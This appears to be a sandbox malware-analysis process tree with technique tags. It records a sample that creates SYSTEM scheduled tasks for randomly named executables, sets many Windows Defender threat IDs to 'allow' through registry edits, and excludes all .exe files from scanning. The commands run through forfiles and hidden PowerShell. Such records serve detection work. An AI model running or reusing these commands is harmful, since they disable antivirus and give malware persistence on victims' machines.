C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cosGrOuVCynQy2" /F /xml "C:\ProgramData\PdOICyyFbClqQxVB\TdvJIVe.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PZmGxZPxdZZSPZWvU2" /F /xml "C:\Program Files (x86)\efiAzqQKrQpqActHLvR\SzpumMq.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NzCzwfloobUmvfgYOrr2" /F /xml "C:\Program Files (x86)\OJMRwiGdhyaHC\BjXLxWG.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\VHwOzmJd\VIRbHiS.exe"C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\VHwOzmJd\VIRbHiS.exe" /S 7m2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bAqRDoFVIdSJfWxTlj" /SC once /ST 22:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\VHwOzmJd\VIRbHiS.exe\" PV /S" /V1 /F3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\VHwOzmJd\VIRbHiS.exeC:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\VHwOzmJd\VIRbHiS.exe PV /S1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "unWjgiOqmrJvCJdsa" /SC once /ST 00:02:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\DOWjalh.exe\" 9Z /S" /V1 /F2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "unWjgiOqmrJvCJdsa"2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3684 -s 8202⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\DOWjalh.exeC:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\DOWjalh.exe 9Z /S1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bAqRDoFVIdSJfWxTlj"2⤵
-
-
